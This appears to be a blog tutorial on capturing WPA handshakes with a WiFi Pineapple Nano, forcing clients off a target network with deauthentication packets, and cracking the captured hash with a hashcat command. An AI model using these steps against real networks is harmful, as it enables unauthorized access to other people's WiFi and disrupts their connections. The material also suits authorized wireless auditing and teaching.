What Do I Need?
- Any Dedicated or Virtual Server
- Kali Linux
- WiFi Pineapple Nano by Hak5
What is a WiFi Pineapple?
WiFi Pineapple by Hak5 has become the new industry standard pentest platform for penetrating WiFi and wired networks. Automate WiFi auditing with scripts and commands easily and efficiently; command the airspace with an interactive recon dashboard, and stay on-target and in-scope with the leading rogue access point suite for advanced man-in-the-middle attacks.
- Set Up WiFi Pineapple
- I recommend connecting the WiFi Pineapple Nano to a stable USB power supply capable of delivering 9w for initial setup. When connecting to a PC, use the included USB y cable.
- Download the latest WiFi Pineapple Nano firmware from the Hak5 Download Center.
- Plug the Nano into your computer using the included USB y cable.
- Head to the default landing page:
http://172.16.42.1:1471
- Follow the on-screen instructions to complete the setup. This process should only take 5-10 minutes depending on the power of your machine.
- Capturing WPA Handshakes
- Log into your administration portal.
- Select ‘Manage Modules’ option on the left menu.
- Select ‘Get Modules from WiFiPineapple.com’.
- There are a lot of modules to pick from and the library is ever increasing in scope. Seriously. Get online and check them out.
- We want to install a clever module named ‘SiteSurvey’. The ‘SiteSurvey’ module allows the tester to view access points transmitting around you, with information such as ssid, mac, encryption method, cipher, authentication method, channel, frequency, and signal quality. This is also where we start capturing data from the access point and, of course, de-authentication of the access point.
- Once the ‘SiteSurvey’ module is installed you’ll be able to access it from the left menu, under ‘Modules’.
- Click the ‘SiteSurvey’ module and any additionally required dependencies will be installed. It’s recommended to install the module to ‘Internal’ storage. It’s been reported that problems can be experienced with linking if the module dependencies are installed on ‘SD Card’ storage.
- Once the dependencies are installed new menu items will appear under the ‘SiteSurvey’ module. Before you can start to scan you need to specify the interface to be used. It’d usually be wlan0 or wlan1. Remember that the Nano has two interfaces.
- To find out what Access Points (AP) are currently nearby we can scan for just AP or AP Clients. For now, let’s just scan only for APs.
- Once the nearby APs are discovered we have multiple options available on the far right. The capture will start listening on the channel of the selected AP and will highlight traffic that’s currently being sent and received. The ‘SiteSurvey’ module will listen specifically for ‘handshakes’.
- Click the ‘Capture’ button that’s in line with the AP you’re interested in targeting. Starting the capture process.
- Next click on the ‘Running Processes’ menu, and you’ll see that airodump-ng is currently running.
- Once the capture begins ‘SiteSurvey’ will create a new entry under the ‘Capture’ menu at the bottom of the interface. It updates every 5 seconds to show the number of ‘IVS’ and ‘WPA Handshakes’ that have been captured.
- If handshakes aren’t showing themselves for quite some time or at all, you can attempt to deauthenticate or kick people off that network by sending ‘Deauth’ packets. To do this, click the ‘Deauth’ button in line with the target that you’re scanning.
- Once the Deauth process starts you can double-check that it’s running by looking at the ‘Running Processes’ to see that the aireplay-ng is operating.
- Once you’ve acquired the ‘WPA Handshake’ capture, you can stop all of the other currently running processes.
- You can now either view, download, or delete the current captures at the bottom of the ‘SiteSurvey’ module. For now, let’s download ‘Capture’ and try to crack the captured hashes from the recorded ‘WPA Handshake’.
- A compressed folder will be downloaded. Once uncompressed, or unzipped, you’ll be left with something that looks a little like the below screenshot. The handshake hashes will be contained in the .cap file.
- Cracking the Hash
- Kali Linux contains several native ways of cracking WPA/WPA2 hashes. One of the awesome tools is something called ‘Hashcat’.
- To crack a hash using Hashcat we need to convert the captures file to something that Hashcat can understand. There are two ways of doing this.
- The first is you could upload your capture .cap file to https://hashcat.net/cap2hccapx/ for online conversion.
- The second is you could download Hashcat-Utils to your system and do the conversion locally.
- Once you have your converted .hccapx file downloaded you can then pipe it directly into Hashcat for cracking using mode 2500 using the following command:
./hashcat64.exe -m 2500 hash.hccapx
- Now, sit back, relax, and wait. This could take some time depending on your computer’s specification.
Conclusion
There’s a lot of use cases where this knowledge becomes extremely worthwhile. However, it should always be remembered, with great knowledge comes great responsibility, which means, simply, that just because you know how to do something, you don’t do it just because you can. There’s a lot more detail we could go into with the above how-to; for example, by using custom-built rainbow tables to brute-force the handshake hashes. But whatever way you go about cracking those WiFi passwords, it’s likely to be computationally expensive.
- You can discover new info about Best website hosting by clicking this link.